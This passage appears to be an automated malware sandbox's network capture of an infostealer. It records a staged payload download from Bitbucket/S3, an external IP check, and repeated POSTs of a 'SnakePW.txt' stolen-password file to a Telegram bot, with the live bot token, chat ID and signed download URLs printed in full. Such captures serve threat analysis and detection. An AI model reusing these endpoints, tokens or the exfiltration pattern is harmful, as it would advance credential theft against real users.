                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.8 | 49715 | 132.226.8.169 | 80 | 7064 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
Dec 18, 2024 16:31:01.517141104 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Dec 18, 2024 16:31:02.946461916 CET | 273 | IN | HTTP/1.1 200 OK
                                                                                                        Date: Wed, 18 Dec 2024 15:31:02 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 104
                                                                                                        Connection: keep-alive
                                                                                                        Cache-Control: no-cache
                                                                                                        Pragma: no-cache
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        0192.168.2.849705185.166.143.484434896C:\Users\Public\Libraries\spoolsv.COM
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:30:32 UTC187OUTGET /ntim1478/gpmaw/downloads/202_Cneehezxuzj HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept: */*
                                                                                                        User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                        Host: bitbucket.org
                                                                                                        2024-12-18 15:30:33 UTC | 5925 | IN | HTTP/1.1 302 Found
                                                                                                        Date: Wed, 18 Dec 2024 15:30:32 GMT
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Content-Length: 0
                                                                                                        Server: AtlassianEdge
                                                                                                        Location: https://bbuseruploads.s3.amazonaws.com/e427e629-62a6-4ecd-bf22-56e4d6ea083f/downloads/3fdf6255-c09f-4309-a330-311e812ab273/202_Cneehezxuzj?response-content-disposition=attachment%3B%20filename%3D%22202_Cneehezxuzj%22&AWSAccessKeyId=ASIA6KOSE3BNHUQUF4A6&Signature=cFww4wpmqtopKHlnmXlm4GVTpQg%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEJj%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJGMEQCIEndov2P1y0Z9e0DlTVxAv6A14kmp9GBJjmAh%2FjmTMFwAiBjG2TfGOxIkvMGRVFDckh%2BAASexPpbLyJKYHMryKxSriqnAghhEAAaDDk4NDUyNTEwMTE0NiIMf%2Bh2cKia5Yx4TuvBKoQCEEzKKpluFmsQkjGCbSPYf%2BLJiFaVkBou%2B66q5kuWxCylJUxBLQOH3EPVfOOqBUsjv%2BplzMxEMKiVkX7udPXu7zIKdXWWG%2B%2BprQZWvy0TX23XQIYbgpnfJojx0RHba%2BldodnwwKFHrr3lIgLVesPQYtw%2BCu6ZsSzrD29UkfkzW8%2F1hoA2B9KHRvxC9iLESNK%2BeIGKhxzVjTXsaxwf%2BSOHufmSV7YsLhCS9yy56Xi7gDSRpgaqGyuCq1RWZTJumEq3IbG6r4YeWb%2BAI6F5GCPynlAkfItG6ShyZ1YbOdESvbkj%2Bg51ynTw5XoOaU%2Fbe4vVdWpFvhgzAs6zpE%2FVGK3eqCo%2FMJ4w6dSLuwY6ngEhZlKNLEhMPrSpaSiwOVqR5QNGIQ%2Fe2ipvll7jjw67tvUewMuEkhMTDcvqFrlpslPfjG4qG81rcgIZEGMXYjC0fmyX7 [TRUNCATED]
                                                                                                        Expires: Wed, 18 Dec 2024 15:30:32 GMT
                                                                                                        Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
                                                                                                        X-Used-Mesh: False
                                                                                                        Vary: Accept-Language, Origin
                                                                                                        Content-Language: en
                                                                                                        X-View-Name: bitbucket.apps.downloads.views.download_file
                                                                                                        X-Dc-Location: Micros-3
                                                                                                        X-Served-By: 57fb0654857d
                                                                                                        X-Version: 020364176b66
                                                                                                        X-Static-Version: 020364176b66
                                                                                                        X-Request-Count: 1070
                                                                                                        X-Render-Time: 0.055730342864990234
                                                                                                        X-B3-Traceid: 5d38a543df8d42b8ae541d57a013e8b8
                                                                                                        X-B3-Spanid: 6e0da9d9a456bddd
                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                        Content-Security-Policy: script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/; object-src 'none'; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net atlassianblog.wpengine.com id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ w [TRUNCATED]
                                                                                                        X-Usage-Quota-Remaining: 999156.068
                                                                                                        X-Usage-Request-Cost: 860.40
                                                                                                        X-Usage-User-Time: 0.021483
                                                                                                        X-Usage-System-Time: 0.004329
                                                                                                        X-Usage-Input-Ops: 0
                                                                                                        X-Usage-Output-Ops: 0
                                                                                                        Age: 0
                                                                                                        X-Cache: MISS
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-Xss-Protection: 1; mode=block
                                                                                                        Atl-Traceid: 5d38a543df8d42b8ae541d57a013e8b8
                                                                                                        Atl-Request-Id: 5d38a543-df8d-42b8-ae54-1d57a013e8b8
                                                                                                        Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                        Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                                                                                                        Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                                                                                                        Server-Timing: atl-edge;dur=167,atl-edge-internal;dur=3,atl-edge-upstream;dur=165,atl-edge-pop;desc="aws-eu-central-1"
                                                                                                        Connection: close


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                        1 | 192.168.2.8 | 49706 | 54.231.224.185 | 443 | 4896 | C:\Users\Public\Libraries\spoolsv.COM
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        2024-12-18 15:30:34 UTC1291OUTGET /e427e629-62a6-4ecd-bf22-56e4d6ea083f/downloads/3fdf6255-c09f-4309-a330-311e812ab273/202_Cneehezxuzj?response-content-disposition=attachment%3B%20filename%3D%22202_Cneehezxuzj%22&AWSAccessKeyId=ASIA6KOSE3BNHUQUF4A6&Signature=cFww4wpmqtopKHlnmXlm4GVTpQg%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEJj%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJGMEQCIEndov2P1y0Z9e0DlTVxAv6A14kmp9GBJjmAh%2FjmTMFwAiBjG2TfGOxIkvMGRVFDckh%2BAASexPpbLyJKYHMryKxSriqnAghhEAAaDDk4NDUyNTEwMTE0NiIMf%2Bh2cKia5Yx4TuvBKoQCEEzKKpluFmsQkjGCbSPYf%2BLJiFaVkBou%2B66q5kuWxCylJUxBLQOH3EPVfOOqBUsjv%2BplzMxEMKiVkX7udPXu7zIKdXWWG%2B%2BprQZWvy0TX23XQIYbgpnfJojx0RHba%2BldodnwwKFHrr3lIgLVesPQYtw%2BCu6ZsSzrD29UkfkzW8%2F1hoA2B9KHRvxC9iLESNK%2BeIGKhxzVjTXsaxwf%2BSOHufmSV7YsLhCS9yy56Xi7gDSRpgaqGyuCq1RWZTJumEq3IbG6r4YeWb%2BAI6F5GCPynlAkfItG6ShyZ1YbOdESvbkj%2Bg51ynTw5XoOaU%2Fbe4vVdWpFvhgzAs6zpE%2FVGK3eqCo%2FMJ4w6dSLuwY6ngEhZlKNLEhMPrSpaSiwOVqR5QNGIQ%2Fe2ipvll7jjw67tvUewMuEkhMTDcvqFrlpslPfjG4qG81rcgIZEGMXYjC0fmyX7PQssGw0Vl9DOmiTKooxU4XM8Nsbc08SmOisr1aKKCWOS [TRUNCATED]
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept: */*
                                                                                                        User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                        Host: bbuseruploads.s3.amazonaws.com
                                                                                                        2024-12-18 15:30:35 UTC | 544 | IN | HTTP/1.1 200 OK
                                                                                                        x-amz-id-2: CwGZgzHC2X+b9SQMp/NOlLjHzrTs+kJgQnVG2vBBta7JVWN8N0CCGhdzUsr9iLtRFdSQgKA+lEw=
                                                                                                        x-amz-request-id: DPBEZKKMMF5JDYRF
                                                                                                        Date: Wed, 18 Dec 2024 15:30:36 GMT
                                                                                                        Last-Modified: Tue, 10 Dec 2024 22:09:20 GMT
                                                                                                        ETag: "26779352338d9dc792b7823fbf8d3268"
                                                                                                        x-amz-server-side-encryption: AES256
                                                                                                        x-amz-version-id: IA20jz0GkMTujfnoGO26P_HUbrxCsGFq
                                                                                                        Content-Disposition: attachment; filename="202_Cneehezxuzj"
                                                                                                        Accept-Ranges: bytes
                                                                                                        Content-Type: application/octet-stream
                                                                                                        Content-Length: 777592
                                                                                                        Server: AmazonS3
                                                                                                        Connection: close


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                        2 | 192.168.2.8 | 49712 | 149.154.167.220 | 443 | 6760 | C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        2024-12-18 15:30:50 UTC | 352 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd1f4f091cadca
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        Connection: Keep-Alive
                                                                                                        2024-12-18 15:30:50 UTC | 535 | OUT | Data Ascii: --------------------------8dd1f4f091cadcaContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:38Client IP:
                                                                                                        2024-12-18 15:30:50 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:30:50 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:30:50 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":419020,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535850,"documen


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                        3 | 192.168.2.8 | 49714 | 149.154.167.220 | 443 | 6760 | C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        2024-12-18 15:31:02 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd1f4f155e2696
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:31:02 UTC | 535 | OUT | Data Ascii: --------------------------8dd1f4f155e2696Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:38Client IP:
2024-12-18 15:31:02 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:31:02 GMT
Content-Type: application/json
Content-Length: 515
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:31:02 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":419022,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535862,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.8 | 49716 | 149.154.167.220 | 443 | 3428 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:31:03 UTC | 352 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd1f4f1166fd31
Host: api.telegram.org
Content-Length: 535
Connection: Keep-Alive
2024-12-18 15:31:03 UTC | 535 | OUT | Data Ascii: --------------------------8dd1f4f1166fd31Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:53Client IP:
2024-12-18 15:31:04 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:31:04 GMT
Content-Type: application/json
Content-Length: 515
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:31:04 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":419024,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535864,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.8 | 49717 | 149.154.167.220 | 443 | 6760 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:31:04 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd1f640271612d
Host: api.telegram.org
Content-Length: 535
2024-12-18 15:31:04 UTC | 535 | OUT | Data Ascii: --------------------------8dd1f640271612dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:38Client IP:
2024-12-18 15:31:04 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:31:04 GMT
Content-Type: application/json
Content-Length: 515
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:31:04 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":419026,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535864,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.8 | 49718 | 149.154.167.220 | 443 | 6760 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:31:06 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd1f7a41c14c84
Host: api.telegram.org
Content-Length: 535
2024-12-18 15:31:06 UTC | 535 | OUT | Data Ascii: --------------------------8dd1f7a41c14c84Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:38Client IP:
2024-12-18 15:31:06 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:31:06 GMT
Content-Type: application/json
Content-Length: 515
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:31:06 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":419028,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535866,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.8 | 49719 | 149.154.167.220 | 443 | 6760 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:31:08 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd1f91d002431f
Host: api.telegram.org
Content-Length: 535
2024-12-18 15:31:08 UTC | 535 | OUT | Data Ascii: --------------------------8dd1f91d002431fContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:38Client IP:
2024-12-18 15:31:08 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:31:08 GMT
Content-Type: application/json
Content-Length: 515
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:31:08 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":419030,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535868,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.8 | 49721 | 149.154.167.220 | 443 | 6760 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:31:10 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd1fa7e7d3e4d6
Host: api.telegram.org
Content-Length: 535
2024-12-18 15:31:10 UTC | 535 | OUT | Data Ascii: --------------------------8dd1fa7e7d3e4d6Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:38Client IP:
2024-12-18 15:31:10 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:31:10 GMT
Content-Type: application/json
Content-Length: 515
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:31:10 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":419033,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535870,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.8 | 49720 | 149.154.167.220 | 443 | 7064 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:31:10 UTC | 352 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd1f4f156a80ed
Host: api.telegram.org
Content-Length: 535
Connection: Keep-Alive
2024-12-18 15:31:10 UTC | 535 | OUT | Data Ascii: --------------------------8dd1f4f156a80edContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:31:00Client IP:
                                                                                                        2024-12-18 15:31:10 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:10 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:31:10 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":419032,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535870,"documen


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                        10 | 192.168.2.8 | 49722 | 149.154.167.220 | 443 | 6760 | C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        2024-12-18 15:31:12 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd1fbdeca09ef1
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:31:12 UTC | 535 | OUT | Data Ascii: --------------------------8dd1fbdeca09ef1Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:38Client IP:
                                                                                                        2024-12-18 15:31:12 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:12 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:31:12 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":419036,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535872,"documen


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                        11 | 192.168.2.8 | 49723 | 149.154.167.220 | 443 | 6760 | C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        2024-12-18 15:31:14 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd1fd27f95701a
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:31:14 UTC | 535 | OUT | Data Ascii: --------------------------8dd1fd27f95701aContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:38Client IP:
                                                                                                        2024-12-18 15:31:14 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:14 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:31:14 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":419038,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535874,"documen


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                        12 | 192.168.2.8 | 49724 | 149.154.167.220 | 443 | 3428 | C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        2024-12-18 15:31:15 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd1f4f1d4d0647
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:31:15 UTC | 535 | OUT | Data Ascii: --------------------------8dd1f4f1d4d0647Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:53Client IP:
                                                                                                        2024-12-18 15:31:15 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:15 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
